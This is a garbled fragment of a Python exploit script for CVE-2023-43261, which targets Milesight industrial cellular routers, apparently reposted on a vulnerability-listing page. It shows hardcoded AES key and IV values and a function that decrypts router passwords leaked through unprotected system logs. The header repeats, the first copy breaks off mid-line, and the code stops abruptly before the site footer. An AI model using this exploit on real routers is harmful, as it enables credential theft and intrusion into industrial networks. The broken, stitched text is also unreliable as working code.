#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023 #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023-43261
Script Author: Bipin Jitiya (@win3zz)
Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
"""
import sys
import requests
import re
import warnings
from Crypto.Cipher import AES # pip install pycryptodome
from Crypto.Util.Padding import unpad
import base64
import time
warnings.filterwarnings("ignore")
KEY = b'1111111111111111'
IV = b'2222222222222222'
def decrypt_password(password):
try:
return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
except ValueError as e:
display_output(' [-] Error occurred during password decryption: ' + str(e), 'red')
def display_output(message, color):
colors = {'red': '
Milesight UR5X UR32L UR32 UR35 UR41 Credential Leakage
- Details
- Written by: Khalil Shreateh
- Category: Vulnerabilities
- Hits: 42